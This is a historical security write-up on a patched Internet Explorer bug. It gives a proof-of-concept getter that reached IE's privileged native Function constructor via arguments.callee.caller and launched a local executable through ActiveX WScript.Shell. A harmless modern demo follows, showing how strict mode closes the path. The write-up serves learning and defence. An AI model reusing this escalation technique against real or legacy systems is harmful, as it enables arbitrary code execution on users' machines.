By intercepting a property access that IE’s own internal code triggered during a document.execCommand call, and using arguments.callee.caller.constructor to obtain the native Function constructor, it was possible to execute arbitrary script — including launching local executables. This technique was built on a foundation discovered by Gareth Heyes (WOOBR #1122102).

Object.defineProperty(document, "selection", {
    get: function() {
        var dialogFunction = arguments.callee.caller.constructor;
        dialogFunction(
            '(new ActiveXObject("WScript.Shell"))' +
            '.Run("file:///c:/windows/system32/notepad.exe", 1, true);'
        )();
    }
});
document.execCommand("CreateLink");

When CreateLink ran, IE internally accessed document.selection. The getter fired in IE’s own calling context, and arguments.callee.caller.constructor resolved to the engine’s native Function constructor, which did not have the security restrictions applied to the web page’s own Function. The resulting function ran with elevated privileges, allowing local process execution.
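The mechanism can be reproduced in a modern engine without any of the privileged-context or ActiveX pieces. The following is an added example, not code from the original write-up: it defines a getter on a plain object, lets two consumers read the property, and shows that a sloppy-mode reader leaks its Function constructor through arguments.callee.caller while a strict-mode reader is censored to null by the engine. The names (getterReachingCaller, defineSelectionProbe, sloppyReader, strictReader, demo) are hypothetical; the behaviour described is that of V8/Node, where there is no separate privileged Function, so the only thing exposed is the ordinary global one.

```javascript
// Added example (not from the original write-up): how a property getter can
// climb to its caller's Function constructor via arguments.callee.caller, and
// why strict mode closes that path. In a modern engine there is no privileged
// Function object, so this demonstrates the mechanism, not an escalation.

// The getter and the sloppy reader are built with the Function constructor so
// that they are sloppy-mode functions regardless of how this file is loaded
// (CommonJS vs. ES module); functions from new Function are always sloppy.
const getterReachingCaller = new Function(
  // arguments.callee is this getter; .caller is whatever function read the
  // property. A sloppy caller is exposed; a strict caller is reported as null.
  'var caller = arguments.callee.caller;' +
  'return caller ? caller.constructor : null;'
);

// Install the probing getter under the same property name IE used.
function defineSelectionProbe(target) {
  Object.defineProperty(target, 'selection', {
    get: getterReachingCaller,
    configurable: true
  });
  return target;
}

// A sloppy-mode consumer of the property: its Function constructor leaks.
const sloppyReader = new Function('obj', 'return obj.selection;');

// A strict-mode consumer: the engine refuses to reveal it as a caller,
// so the getter gets null instead of a constructor.
function strictReader(obj) {
  'use strict';
  return obj.selection;
}

// Run both readers against a freshly probed object and report what leaked.
function demo() {
  const host = defineSelectionProbe({});
  return {
    fromSloppy: sloppyReader(host), // the global Function constructor
    fromStrict: strictReader(host)  // null
  };
}
```

The defender's takeaway is the second half of demo(): code that runs in strict mode (or as an ES module, which is strict by default) does not expose itself through .caller, which is exactly the property access chain the IE bug depended on. The first half shows that, absent a privilege boundary inside the engine, the chain only ever reaches the same Function the page already had.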

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.